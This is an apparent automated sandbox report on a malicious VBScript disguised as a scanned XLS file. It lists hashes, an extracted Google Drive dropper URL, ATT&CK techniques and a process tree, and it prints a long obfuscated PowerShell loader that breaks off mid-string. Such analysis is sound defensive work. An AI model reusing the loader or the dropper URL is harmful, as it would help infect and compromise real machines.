c5fdd2b1883246a188a2410bb276961732718a76e5d380ef8fe1db8e05f72915

General

Target

SKMBT_8812202816310TD01_20230128_17355 XLS.vbs
Size

62KB
MD5

b1b4116585f8ad91d96392d0b931f317
SHA1

74c7f75227bac7df1cd2098f30727ddd21cd5b77
SHA256

c5fdd2b1883246a188a2410bb276961732718a76e5d380ef8fe1db8e05f72915
SHA512

cfe7f0b12f821d13fdbde559d0b86a9fd845d64b3d63628f08e16fb430c70ca706148157c4de09e607aa15bc9efb4dac2089e9c2ca5f5064130c7e1d9057c8b4
SSDEEP

1536:F3EyvLpylJpwwY9qdH7W78MUOp/dWvEVWE/d:F/v1ylJWwyqdH7W7HUgdAE4g

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=1zVdm4TylTH05tqt2K3tMhxuhguEtNYmV

Signatures

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

12 4424 powershell.exe
14 4424 powershell.exe

flow	pid	process
12	4424	powershell.exe
14	4424	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

4876 powershell.exe
4876 powershell.exe
4424 powershell.exe
4424 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 4876 powershell.exe
Token: SeDebugPrivilege 4424 powershell.exe

pid	process
4876	powershell.exe
4876	powershell.exe
4424	powershell.exe
4424	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4876	powershell.exe
Token: SeDebugPrivilege	4424	powershell.exe

Suspicious use of WriteProcessMemory 7 IoCs

Processes:

WScript.exepowershell.exe

description	pid	process	target process
PID 2608 wrote to memory of 5096	2608	WScript.exe	cmd.exe
PID 2608 wrote to memory of 5096	2608	WScript.exe	cmd.exe
PID 2608 wrote to memory of 4876	2608	WScript.exe	powershell.exe
PID 2608 wrote to memory of 4876	2608	WScript.exe	powershell.exe
PID 4876 wrote to memory of 4424	4876	powershell.exe	powershell.exe
PID 4876 wrote to memory of 4424	4876	powershell.exe	powershell.exe
PID 4876 wrote to memory of 4424	4876	powershell.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SKMBT_8812202816310TD01_20230128_17355 XLS.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2608

C:\Windows\System32\cmd.exe
cmd /c echo shell
2⤵
PID:5096

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$tjen = """ByFPauDenFicFltDoiNooalnDi UdHSaTAfBDr Su{su Fa De In GupGaaTorBeanomHe(In[UnSAbtPjrMiiDenBrgDo]Uh`$ndAFokReuFopObuOanUd)Ch;Je Fo`$PaKsurRioAneVi Id=Me Co'De'Vi;ph TiWSyrLeiKotCreWe-PjHicoHysFltTe Ul`$TiKsurCaoFieBi;Pr phWDirBeiRetVeeAf-OvHNyomosBatZo Fl`$SwKDirKroAfesp;en BrWGirCyikatSoeud-InHDooTrsDatSu Ve`$prKVerBooFoeMe;Un Ud Su Ti So`$BeBClaSrkKanAniDanligReefl De=Re PaNHueSowTe-WrOHebGojHaeTacprtBr TybPhyKlttrepo[Re]Ar Li(Pr`$ClAMikJouIfpkouDinBe.NeLSyeOvnHagPrtMihKa Ra/St Wi2Pi)Ek;Mo Ma Se Ab huFPaoSurAa(Hy`$KvKUnaHjeGulGoeBndDiySarUn1Fo3Ma3As=Un0Mu;No Tu`$KaKUnaPoeBalpaeImdOdyrerPr1bo3un3In He-folSetNo Pl`$AaASvkUnuSypDdufonWa.baLnyeLanOrgDrtBihUd;Af Dr`$heKDeaNeeTrlLieNedTiygarTe1De3Su3Cr+Sw=To2Ri)Eg{Af Po En Do Ca De al Re Sp`$LaBStafrkBlnPuiFonUngTreSk[An`$StKAtahaePrlHoeApdEnySyrBe1Ti3So3ba/Su2Ta]Sv un=Do Ep[OpcMaodinsivsueAsrTatBu]So:Sv:PuTStoFoBReyErtMoeFr(Th`$ReASikpiuHupTyuSknBr.ChSbouInbvasBetMorLaiPrnNigdi(Sk`$FlKReaPaeUrlAfeCldOiySorTo1Et3Be3Co,ma At2Ta)bi,La Ma1Tr6Py)Mi;Da Da Si`$NaBNoaKokOrnReiKanCrgPreHd[In`$FoKCraVoeRelMueFrdLbyDorMi1Hv3Im3Ph/Kl2Ap]Sc Sc=Bo Kf(De`$NoBVeaSnkRanNeiBenWigPaeAl[En`$CaKUnanyeNelLieLudCryGarTa1Su3Re3Bo/th2sa]Sa La-NibOlxGroStrQu sw2da1De0Fr)Ch;Sk Sv Ag Tr Ma}So No[KaSDitPrrSpiHunDsgFo]Gr[GeSSmyPasTrtUneSumMu.HjTPheRexOptau.HuEUlnPrcHooTidUriKenNogRe]Wi:Ve:FrALeSbrCUnIRaIFi.SvGDeePatOmSUdtForCliBynSpgFo(Va`$ToBEnatakScnSaistnPlgNaeNi)Co;De}Co`$coPHorMyeOrhNaeNesFaiFotLaaUn0Re=ObHSuTFoBVa Co'ma8Pr1SpAboBAfASq1InAPl6RaBFo7KaBScFufFFlCDeBOv6ToBKnECoBSoEcu'ba;Il`$DiPDorOoeMehCoeFisIniintWaaKa1Ov=TaHPhTNoBSo An'Hy9RiFCoBIhBEtBHj1UlAeu0AfBshDUaALe1StBReDInBAr4WhAFo6unFPeCMa8Co5OcBNoBStBEnCUfETe1GiEUn0ImFCrCPl8Sc7ElBAdCStAOv1BeBIn3CaBSt4MiBUa7St9TiCDeBfo3SkAAe6RiBUnBFjAVo4EfBBo7Te9SkFTaBUn7RhARe6TyBPoANvBPhDCaBLa6AgACl1Ta'An;Fl`$FrPUprGoeRehSneOrsAriKotOnaKo2St=DiHPuTGrBEt Rh'Hy9Ma5StBGr7HoARi6Te8Fo2PoABo0PaBraDAfBSm1Qu9Be3ReBSp6AnBBu6beALo0EdBYo7DiABe1DvAKu1In'en;Un`$raPkarZoeSkhKietisGoiCatElaUn3Kl=XeHUdTBoBAn Ha'Fe8Wi1TeASyBSnATe1GoAFr6HoBSt7TuBSkFAiFPrCAf8Bi0NeANa7DiBMoCDeAOs6OpBPrBPeBBrFCoBTe7PsFHjCRe9PrBLaBRuCReATe6DaBHe7AnAHm0MeBStDDrABr2Tr8Fj1AbBLo7PeASt0BaARe4KrBOkBFaBaf1ApBVl7QuAsp1SeFPaCVi9AuASlBan3PrBUnCStBPo6SlBDyEFrBBr7Br8ba0AfBSt7BoBAn4Ca'Ba;Ne`$DiPDerKreKehBieResEsiMetMoaGa4Bo=AnHdiTVeBla Nu'PaAPa1CuAKo6BrADe0deBSkBJaBCoCLaBTg5or'St;Re`$igPBirIneUnhCoeUnsAniTitChaUe5Tr=ZiHReTStBcr Co'Op9En5KoBKo7FaARi6gr9ChFReBKiDSkBRo6ThAco7AmBTlEFrBBr7Bi9HeAThBRi3StBInCInBSu6ArBSiEUnBBe7Ku'Qu;Ye`$UnPArrCaeSthUdeDisAsiBgtsyaAn6Fo=KaHBeTPnBKo Ov'Pr8Ik0Sp8Ma6Un8jo1JoASo2FiBLa7BiBLe1PaBTaBUnBMe3GrBSkEPr9HaCOvBFe3FrBKuFLiBBa7ApFMeEVeFSa2Re9StAFoBMiBBaBin6ViBWi7et9Ey0ApABiBCa8kr1FlBprBNsBNa5FoFafEFaFSt2As8Sl2HaAEf7SuBRa0clBGaEUnBOvBEkBcy1Sl'Fo;Bu`$UtPherMaeanhBueShssyicetHuaEs7Om=InHBaTkoBFr De'Sk8St0ReAOv7AfBPuCHeAdi6UdBTvBDuBTrFElBAd7leFMoECaFNa2Ic9DaFArBSo3AuBFoCHeBLo3WiBEv5ScBGe7InBAl6He'Na;De`$RePPorUdeDohGeeBesReiDutUnaAl8Tr=OnHAlTOmBMa Ea'Ti8as0GuBCo7NoBDu4MoBHeETuBSu7BlBum1guAIn6JuBRi7AlBMi6Un9te6AnBMi7DrBLaEDrBRi7KrBPl5BeBJa3ScAsu6HrBFl7Ve'Bo;Si`$SkPForJeeThhSpeSksCaiFatTraPu9Pi=EnHsoTFaBUn Sk'Sc9FaBRaBmiCUn9BrFTeBal7AaBNoFFrBfoDKrASl0ToANoBAf9FeFSkBFaDBrBRd6UlADy7SaBFrEQuBFr7Sk'Br;St`$TrSPralamTofTauKonCa0Ku=AlHBiTReBTo Ki'Pe9DaFUnAReBOu9mi6HjBRd7CoBGeELiBGy7AsBUd5GeBSp3SpABa6LnBAr7Si8Pr6EkAprBTaAAt2StBbr7Cl'Dr;Br`$FlSsaaPemRefAquMenHs1Un=AvHInTMyBIh Pe'Un9St1DiBDeEAlBUn3stATo1ReASo1CeFAcEGyFRe2Se8Ti2SeADo7UnBOm0spBLfERoBFoBToBYd1EmFamEPrFPa2Ba8Br1AnBEv7RoBSa3TiBElEStBGl7jaBwa6SpFgrEDyFPa2Bu9Bo3JuBSlCLnAUp1NuBUnBin9Mu1GaBMoEAgBSe3MaASc1AcAHa1BeFStEOpFBe2Hr9Si3ArATr7AnATi6InBBaDKo9Ne1NoBClEMeBPr3OpAEk1SmAVe1En'id;Uf`$BlSRoaPlmUnfSkuNonCh2Gi=SeHOvTTyBDo Mo'Pl9SpBPeBDeCHyATr4ChBUfDMaBBe9MiBTo7Eu'Ef;Ka`$GlSbiaMimTrfAruJonAf3Mc=ChHPrTScBSp St'Sy8Vo2IrALy7TrBFl0ReBInEReBFrBFrBBi1ReFSaEOvFMe2Er9TrAUnBFuBFeBha6taBwa7Bi9Li0FoAInBMi8Cl1PhBBlBHaBPo5ouFfyEhjFRe2Fo9AnCScBHa7FaAse5Sl8Ga1SnBBaEOmBFyDCoABl6OcFCrEMaFDe2Af8Ga4meBecBliAHo0MoAMe6PyAGa7KvBPa3InBInEPr'in;Af`$soSTaaGimPifGuuHenPr4Un=HyHcrTAlBRe Kr'Ln8Hu4EtBRoBBrADi0CyASe6OvATa7NoBBa3HjBKvEAm9La3MaBRuEMeBfrEUnBLiDPrBRu1In'It;In`$HeSBuaUnmRefBauFlnHy5Re=JaHIaTRaBCl Sn'JeBStCZoAMi6UnBAb6PoBHaEUdBveETr'Al;Ne`$MoSUnaComAafbouTinSn6St=UnHExTDoBLa Ha'Ma9PrCAdACi6Ou8Ca2UnACl0TaBNoDAnAMa6CrBYp7MaBAl1FoAGu6Di8Be4teBReBStAFr0agAgl6BeASk7ugBRe3CoBLaEGa9NoFRaBDe7fiBReFBeBFuDBeAru0SeARoBCh'Ud;Se`$ScSPraTemPlfCiuTinSt7ti=SnHjeTBrBPu ta'Re9BeBMa9Un7Ku8ToACi'Ne;In`$ToSCnaLimRefGeuSknDi8Bo=OsHFoTSmBVa Us'Os8RiENa'Su;Ha`$CoAUcnwitChiOr=AfHFiTOlBSl Bi'fo8Se7ce8Fa1Fr9In7Cu8St0SdEBe1MaEGa0co'Su;Ge`$anMEfisktVehPrrSkaAn=GlHcaTDiBAs Sw'Er9Af1BaBAp3BsBFrEPoBHvEPl8Ru5NoBLiBLiBExCFiBSv6PhBcaDUnAAg5be8Re2KnARo0NaBFaDUlBUn1Pe9Ba3Ek'Al;MefCauLanMicretreiProUdnDi HlfHekafpSa Sl{NoPFoaGorBaaPrmBe Ar(Le`$KoAKapFusCoiShsHofAnrredPaiGegir7Vn1My,Pi Pe`$SiPPaaMeiSylSklTr)Ku tw Mi Sn Ov Da;Pr`$UdTBeoIstSetOpeTorPriPr0Af Ne=DeHHoTThBLe Me'FlFSp6So8De1LoBEmBHuASt0beATo2DaBAnEUrBVa7BrBMo1UnBSk3BaBFoFNoFAs2DaEExFPrFYf2SeFFsANo8Co9St9So3aaAka2LnAVe2mo9En6NaBSkDplBTrFDaBTa3ThBAiBKaBPaCMe8AdFkeECr8TeECo8Or9Ki1UnATe7HoAMy0EvAEr0BuBRe7OcBDiCdiADr6Ma9Be6PoBSeDSuBAlFabBCa3DiBOpBTrBWeCNoFBrCFo9Ku5GrBal7VeAKo6Yd9Os3HeADe1LaAFs1KoBEx7DiBSpFAnBun0enBBoEFuBEnBBoBWi7LiASe1ChFtaASkFnuBCaFJu2syAKaESoFSt2Ef8ge5blBAfAPyBGr7FoATi0CaBLd7TiFSlFFu9EvDReBUb0prBSe8BlBUn7PeBSe1FlATe6ThFGr2UpAFe9FeFbj2GrFCo6De8AbDHaFCyCOm9Pa5SwBKvEBrBAmDBaBUn0UnBSt3SaBeyELi9Po3BlAUn1PrAYs1GaBPe7WaBSuFMyBCi0FoBPrEDeASeBCo9Un1asBCa3veBNe1ThBOvAMiBMi7ImFOm2StFObFSt9ch3CiBLyCleBku6UnFKo2RaFSk6Pr8CyDRaFAnCPa9BeEFrBTrDEkBCh1SmBMo3FiAMo6teBfiBExBDaDcaBBuCStFNoCbe8Jo1RhATa2GaBDrEUnBSmBStASh6HoFOpARuFfe6Br8Bl1HyBWi3NoBTiFSkBLe4RoAKb7FiBOvCCaEFaASkFFlBfo8Di9DeFWeFViETr3ju8SuFAuFReCTr9Au7tiACu3skAPh7alBAp3UnBSmESeADi1CoFNaAKrFAf6Tr8Ag2PaACh0HaBfa7TaBReANoBCh7BeAOp1NoBRoBChALu6PaBIn3AnECr2BlFImBKoFpr2DiASkFVaFChBPrFMoCRe9El5stBGr7TiAAf6Sk8Ca6TuAShBBaASk2KoBKo7StFAnARaFCh6Be8sa2KeASt0SeBJo7SaBSiALiBEa7noABa1AfBUnBSuACo6BlBMe3TaERe3PrFfrBaf'Sg;Sy&La(Sp`$GoSNoaPamOvfPeuLancl7ar)Am Kn`$OvTDeoretArtLueIlrAuiEr0sv;Mi`$HeTKaoMotRetmaeAorPaiSk5Ko fr=Su LeHRiTwrBHo Te'AfFTr6Tr9ge0TiBTiDPaBBe5SiBPaABaBGoDRaBDeEMiBho6ChBSt7CoATh0DeASy1FrFGr2LeEFeFKoFBi2UnFRe6Fo8Sy1ClBHjBAlAHr0ErACo2DoBreEKoBIn7FrBOr1FlBEx3BeBBuFCiFRsCEn9qu5skBFr7StACo6Un9grFOvBFl7PoAAn6InBPlACiBFoDStBvi6AaFDgAAtFRe6Kr8sa2SaAPo0PuBCa7AfBTeAstBAr7SuAOv1MiBLoBSaAPr6GaBHu3PiEGe0ViFTeEAtFAr2No8Bo9Ev8La6foATeBBeAle2AnBsy7St8Co9Re8SkFpl8AnFDoFcr2El9Ne2ReFanAQuFJu6Fr8co2InAMu0AfBAp7GiBAmAumBlo7CoAPu1ScBPeBAuAUn6PrBNi3VlEKo1SuFReERiFBe2PuFRe6st8Sa2PoAMi0edBKr7HoBStAagBAf7OpAPu1AaBSeBTrASt6ViBBe3EpERe6CyFInBUiFSmBTo'Af;No&An(El`$loSToaSemfifAduTrnSp7Mr)St Jo`$SeTSmoDetAltSueKarKliul5Ta;Am`$CaTMaoVstTitSieVirpaiAl1St So=Li ilHRrTOdBSv Ps'UdACa0FiBSu7smAMa6NoANo7EpASh0PhBEgCReFAf2faFOp6De9Ma0ShBPtDPoBMi5upBLeAInBFlDMoBReEReBYd6SiBWh7UvAIn0TaAVe1InFRaCHa9KoBStBGeCCiASp4BuBKnDSnBSr9UnBAr7BeFKrASuFTe6HyBGlCDaAAu7HaBbiEBoBFaEinFTaEFiFCi2ka9kl2koFCyAMa8Ni9St8Du1InAPlBOvARe1JaADj6KrBli7FoBVaFPrFEpCKn8In0FoATo7TsBToCDoARe6GvBNaBReBreFMiBMi7UlFArCDa9UnBAfBClCunABn6AnBSt7VaASp0ElBStDSkAIr2St8De1CiBOv7UdAPh0GgALe4FiBInBUpBSt1FaBAu7GeAUd1MoFChCCo9ReAMaBAf3RuBHeCCuBCe6PiBreEDeBAf7Oc8An0PlBOp7PaBGr4Kr8DoFOvFanAMa9BoCDaBPa7UdAMo5SeFDiFNo9SvDUsBSt0AfBsm8SkBSu7ChBFr1FiARa6PoFTe2Mi8Re1OvADvBchARf1KoAPe6AaBSu7AkBSlFSqFNyCMu8Be0HoABe7KoBboCIrAJo6FeBTrBAfBPrFFaBMa7SkFkeCTj9WaBbiBXeCCoAJo6BeBBr7SyAAf0KoBHeDAnALu2Br8Ef1PrBWh7AlAWa0AkAHi4KoBprBPhBSm1GaBSk7KiAGy1PeFVaCDi9ReACaBpa3IrBCiCEnBKo6TiBBlEblBcl7sl8Gl0TiBRe7UnBSa4KaFUoAHyFLoALs9PoCAnBsk7inAtu5TiFAnFPe9KaDDiBSt0LoBUn8BlBFa7JeBCy1exAUd6UkFPr2Kl9DiBKeBTeCUkAHu6Sk8Un2MoAAv6PtACi0TaFPoBCeFFaEMeFAr2taFBiABoFNi6Sa8Ut1ImBSaBreAPr0ecACo2SkBCaEUnBAu7AlBPl1DiBAd3PuBScFShFPrCFo9Fo5ciBgl7GrAVo6Oc9PeFBaBBl7RaAUi6StBAcAMoBNeDLaBHa6SnFbrAPoFSh6So8up2caARe0TfBDr7UvBDoAUdBSl7FoAPa1SiBstBAlAUn6trBUn3paERe7ElFSlBSvFDoBDaFLeCsc9VoBHyBPaCNoAHa4AuBLaDBaBnd9UdBUn7IhFudABiFKa6SeBBaCclAMa7KiBPrEnoBViEEnFSeEFiFCh2Rk9Pu2afFViAHuFAm6Sk9Im3NeAAr2StAEx1naBBuBpiAOx1UnBBe4OpAFr0SyBUn6BeBPrBUnBNe5PsEMa5MnEPr3StFFoBRuFNeBFoFunBReFBrBSlFUrESaFSn2axFSy6Gr8Ol2LaBTe3OvBddBypBejEPrBRiEBlFvaBBeFMaBGr'Je;In&pr(Ju`$GrSBaaJemNofUrubrnCa7Fo)Bu Re`$AmTJeoUntBetBleVirKriWa1Aj;Un}NefTauDinDucDetUdiBloBanSp InGdyDSaTOv Se{GePFoaChrStaUnmGr Co(mi[BiPSaaAfrTeaTymFleBetHueDirUn(YaPTaoWosHaiVatStiKuoNinDi Sk=pr Ho0Sw,Le BlMBlaDinOpdCoaOvtAdoBirMiyAn qu=Un Be`$NoTHerInuFaeRu)Ha]Va St[caTUdyPipbleUd[Pi]ha]Sa Kr`$SpHOraTerTrmUn6Do5Gr,Mi[SaPSlaMirTeaAfmleeSktEmeMarDe(JuPCeoBisUniSttUniProSansl Bn=In Pr1En)An]Gr Lo[SeTniyUlpHuela]Re Na`$PeIAmsCrcFohpriUnoAncRoaSeuAc Cr=So St[IrVFooCoiOudEk]Or)Ka;Ma`$BeTInoLitAstSkePsrEriBo2Re Ho=Ne ErHBrTErBSo Ku'FiFFl6Tr9au0MiBNrEMdACh7BeATo0TfACy6BnEDe3PaEWi4AnFDa2FeETeFKoFOv2Ov8Al9Di9Dr3ReAKu2NjAha2No9Co6doBBaDteBKiFOuBSt3BeBSyBBuBVaCBi8HaFStEAp8VeEFo8Ar9Su1AtAPo7TrABa0RuAPo0UnBAf7ScBMaCKhABr6Ca9Af6SuBBeDAfBKaFExBRa3vrBBaBsaBFlCUnFNoCOr9Pr6InBSt7DaBTr4ArBliBInBsuCDuBTi7Al9Ge6CoAPrBUnBStCPrBAc3WaBSmFFiBAnBwaBse1Di9Lo3UdAva1NnASk1OpBte7HaBSqFBoBfr0HuBskEgeACaBTeFHyAUeFSpABa9InCviBRa7OpAKv5SyFBiFKn9ViDPrBCh0CiBDe8MbBPo7KoBDe1GaARe6ZaFsk2Fi8Sp1UdADrBFoAbo1baAOm6UnBAs7VaBskFFrFInCFj8St0BuBDr7CrBTa4StBKaEVeBSm7EjBDa1GtACr6AnBGrBBaBSkDVeBHoCHaFGaCAn9Em3ReAVi1EnASc1AfBGa7FlBWaFFiBAb0BeBFaESkAAnBun9blCRoBis3RaBheFTaBIm7ExFDiAHoFTr6Un8Do2OfAEl0IdBRe7SlBPeAKeBOr7SmAUn1DeBSkBPeAVi6stBPo3SlEGeAilFGnBBiFSoBWeFNaEcrFRe2Fo8Va9La8Fr1unATiBFoAMi1seABr6KlBBr7UnBKoFKeFToCQu8Th0MaBFl7BiBMa4OmBBrEChBDa7stBCo1BeABi6PaBRgBCuBToDCiBCrCyeFBrCsn9In7ViBEjFUnBLeBInAEa6enFNaCHy9Su3AfATa1HaACh1DeBOv7BaBShFFlBKu0InBUnERaAVaBFl9Cr0trAAf7SyBBrBHaBScEPyBSc6JaBPe7SiAOb0Un9In3LaBEv1UnBTh1CoBNo7LaAAn1ZoADo1Sm8UnFNiESu8SlEsy8af8Po0SiAAc7ToBCyCCoFBoBEkFBiCGe9Se6DaBSo7FiBCo4ReBPaBSeBBeCtuBSt7Gr9St6ViAbiBMaBbuCSvBIn3FoBLyFNeBDiBFlBPs1Re9QuFWiBFaDInBTo6chAen7VeBBiEBrBUn7FuFHoAMaFDa6Da8Un2ToADo0SiBUn7BoBOvANeBDi7unAFo1IlBAfBBrASk6FoBRe3LiECoBEnFSeEVoFEf2SaFAb6CoBZe4LuBSm3UlBTaESvABr1FeBOu7OpFAzBBoFDbCar9Sk6RhBLa7GlBSl4VeBLaBPjBHeCgrBDe7Or8Pr6MaADiBNeAIt2PrBSu7MeFBeADiFIn6Sc8Ra1ViBPi3PrBstFGnBTh4AfAGu7AtBDoCCiEFo2CaFSlEAnFBu2FrFUn6Re8Sk1teBOp3StBCoFEnBSo4TeASh7PrBInCBuECa3UnFCoEBoFKa2Jo8Cl9Cy8at1PuAToBFoAUn1PsASk6JuBFo7FaBUfFFiFstCBa9MuFmoASt7waBSaEIkAsy6InBPaBDaBDi1ScBUn3OmAMo1DeAno6re9Ts6RoBSa7TiBRuEtiBRe7ReBRe5KlBRv3AsAbl6MiBSt7Dv8ReFBeFTrBNi'Gg;pr&sk(In`$meSCaaGamsmfAcusynKd7Tr)Re su`$InTNyoCetLutBreZorByiSe2De;Aj`$OvTPioFotIntGleAarRoiFu3Co Ko=Se siHMeTcoBTr Un'SpFEk6Du9Un0FaBIcECoAka7RaAGa0SuAFa6meEUn3NoEVi4RaFKoCNu9Ba6StBBr7GlBKr4TrBKuBDeBakCNuBWo7Da9St1MiBApDNoBNoCPlAHa1ScAZo6unAMe0PaAUl7poBKo1ByAAn6NeBsuDJeARe0MaFMeAOpFNo6Ca8Ma2PaAFo0GiBka7SkBPrAPsBcr7StAbe1SaBLoBAlAKr6SoBBl3PeESt4AvFPiEGaFIn2Ti8An9Fr8Pa1NaAUnBJuAGr1SeANy6GoBan7KoBMiFRoFKlCTe8Hy0miBUn7KoBFa4StBHaEOmBIl7BoBFo1UnACa6AnBTeBUaBHaDKrBOrCOvFMiCHy9Mo1GeBGo3SnBAeETuBLoEChBEkBPoBSiCBaBco5Ra9Ma1NaBFiDMeBSpCSvAKo4PhBRe7HvBStCOrAMi6BrBApBTyBSuDKrBTvCMeASl1Fa8EfFMaEDi8GuEUf8Go8fe1EmABo6ToBOv3AuBSaCexBDe6shBco3DuAMi0MeBSo6ArFBoEFoFMo2OuFRe6Mi9ByAFlBTo3reADi0MoBAuFPoEPh4AmETv7ExFUnBSeFcoCKn8Ty1SnBLa7beAIr6Si9ToBTrBChFbrAsp2orBbuEGeBBe7FlBIsFOeBmu7MoBFiCDuADa6RuBSu3moASh6BrBFrBAnBKaDSeBSjCSl9At4DiBsoEprBMa3LaBIm5BoADu1GuFdrAKoFMo6Na8Me2VuACe0BrBte7HoBSuARaBFr7kaAaf1FuBInBSgABo6PhBEn3PaEPl5SpFDrBKo'Ge;Ej&no(Mo`$TrSPraNomspfNduManUn7ak)Hy rh`$FrTSloMatPutOceSarLeiOv3Di;Sh`$OuTSaoDethetTieAnrEtiNs4Ju Me=Pi RiHdeTAvBDa Fl'ReFKf6Se9Op0EdBBiESaAMu7DiAAl0NoAUn6InESt3SyEbr4OuFSeCSk9ch6StBFl7UfBUf4AcBDeBFoBOvCLaBAl7St9NoFTrBSo7PrAEj6TuBReATrBRlDMuBBo6JuFPrAFaFIn6Te8Ga1AmBbl3alBEdFFrBTu4SkANo7FeBReCChEst0RuFFeEBlFLa2CoFde6He8Ka1GgBKo3TaBTrFDiBFo4SiAEp7PaBTeCChEYo1AnFUnEFaFUd2taFPo6Ot9TrBStAHe1HjBIn1PiBVoACeBSlBViBMaDSaBSo1KeBPo3PhATi7ofFunEFrFaf2OdFFu6ne9FrAFiBLi3HoAGe0SaBMeFKoEBn4CeEAf7KeFZaBSkFDeCDe8Be1HeBBe7RiAga6Tr9DkBThBPeFAlAPe2SwBTaEBeBBo7MaBhuFAaBAn7PeBBaCUnADa6psBma3BiAAd6BlBFoBInBBrDarBUnCTi9An4LeBSlEDyBpe3AaBpa5caARe1TjFsaAfaFMa6Ga8Te2SkAAl0PeBTi7CaBGaAreBun7FlAIn1paBNaBUnATr6RnBNo3LeEbe5SaFAkBCa'Dr;Re&Pr(Po`$LuSwrahumMafOruTrnAs7An)fr Fr`$KoTTroNotHjtPreForSiiAn4Su;Re`$NoTcioVitRetGteOvrAriTr5Ko Mi=ar UnHNeTbeBSe Lr'BlASy0FrBOv7PuAPo6DrAGo7ruAra0OrBCoCBlFLe2FaFDe6Ra9Os0leBFaEFeAMi7inAGa0SuAfr6NoEHj3BeEEn4GeFVeCar9Re1TiARa0ciBAe7heBUd3GuASl6PjBsi7no8Ch6BlAInBMaAPe2EjBSk7KaFPuABrFKoBAs'Bi;Af&Mi(Le`$DaSAdaBomRefUfuTonMj7Re)Sc No`$KaTPaoMotHotPreSprTeiWo5Sa Ri Va Ko;Vu}Do`$OoRMaeDucSiiUntRaeAdrRosUndAfaBo Gr=Op ViHStTLyBTa Bl'EaBJo9SuBaf7SkAEf0UnBUnCFlBAm7piBDrEOpEFr1AnERe0Se'Mc;Vi`$imTInoRetIntRoePlrgeiTi6Xa Ta=cl ApHMaTUnBTr Ta'MeFPl6Su9PrCHaBSlDSuAet4RuBEp3SkBElESeBAa7TrBPa0DeBLoEglFSy2reEArFMaFAl2se8In9Ta8Tr1AcAUmBSpAsi1LeASt6ThBUd7DyBLoFViFSeCEu8Ph0HaAOv7ElBCrCNoADi6FuBBoBInBReFSuBKl7KaFFrCBr9HaBAtBVeCAfABe6CaBUl7RoAsu0PeBExDSoAFo2Sh8Fo1BuBst7arAAn0MiAEp4HjBFaBReBRe1TrBKr7PrASa1GrFSaCFy9LoFDiBLe3ElAde0TaACh1UoBBoAStBIn3TeBAnEBr8DiFPoEEn8SpEPh8Sv9Li5SnBse7EsAGe6St9Re6UdBTh7shBKaEViBSk7JeBGl5BoBCu3SkASk6ZoBAn7Re9St4UdBDiDRhAst0So9Un4SuAov7AcBInCFoBEt1SiAFo6KlBsgBMaBPrDAcBSkCLn8Ga2EgBSoDKaBSiBreBSmCkeABl6seBTh7SkAAl0SaFCaAMeFStACrBAs4UdBVe9ElAma2SpFEd2NaFWr6Ph8Gr0UdBEx7PrBAl1FlBdeBFoAPe6MoBCo7ToAPr0BlATr1myBSt6ReBFo3peFOv2HuFAn6Ud8Ex1AsBUd3BoBVaFNoBGg4FoATe7UpBboCFuEAi6OpFMaBSuFToEplFKo2HoFCoABr9Ep5Fo9Fa6Hu8Li6TrFOp2Fo9Ti2BeFChALo8Ne9Pl9RiBCaBAvCHuASe6Tr8Un2FlAKr6PoAVi0Ge8DeFCaFStEraFSt2Fa8Ek9Sk8Fo7Si9EcBUnBHeCSoALi6brEPr1ElENg0Sa8NoFFoFFiEUrFSt2in8Po9Bl8Ma7An9ZoBRhBOlCReAam6opEHe1ScEFo0Ev8RoFGlFBeEEgFRy2Nu8St9Ko8Li7Be9ReBOvBLaCPrAna6ReEOb1teERe0Ha8XiFufFDiBBaFEt2SpFStADe8Ub9Fu9CuBViBBrCCeAPa6Mi8Ex2DiAQu6PrALa0Ba8AmFMiFDaBBlFSoBDiFTaBTi'Me;Pu&Hg(Kl`$DeSOuaUrmbafLiuTinKl7Tu)Ex Mi`$VaTStoMetTstEteKorSviCh6Vo;Ac`$AfSGatPoiUnlAfkTh7Ad1ke Bi=Ko EnfMekStpEl Cy`$SkSPoaComHofTruDynSt5No Mo`$DaSFiaSlmSpfHouRonUn6Be;To`$ElTamoCrtAbtSqegrrGsiDa7Pa Gi=ov NaHReTTaBAc Si'KaFSt6Cy9Br4AcAFe0StBMi3BeASv1CaBPa9AnABa0BjBMiBKrASe4VtBUn7JaBsuEIsECo1HeFLa2LuEUnFreFKo2HeFYf6fa9SkCSpBdrDIaACi4DiBTh3maBTeETiBIn7opBZi0RoBSoEMaFMeCFy9SgBPtBriCLsAPa4MeBRaDGlBTv9DiBAr7ImFFoABo8Kr9Ge9SpBFoBFyCakAOv6Ov8Li2SiAno6AcAOv0Ma8BeFunECo8HaEsk8Am8Un8CyBLa7SiAHo0flBinDunFFaEFoFdi2MiEWa4WeESy6ThEac4RaFplEInFDo2CoEEl2EvATaAEnESm1AnECt2reEIn2PaEun2OvFSkEHeFBa2AuELi2TaAKoATjEJi6CaEIn2UnFCoBAb'St;No&Do(Ka`$TiSSlaHjmRefTausanSk7Di)Jo Qu`$LaTfloIntDotUneSyrTaiBo7Ha;Be`$ReTInosntPltUheFirKniNo8Ba Sy=Un UnHLrTTeBCh 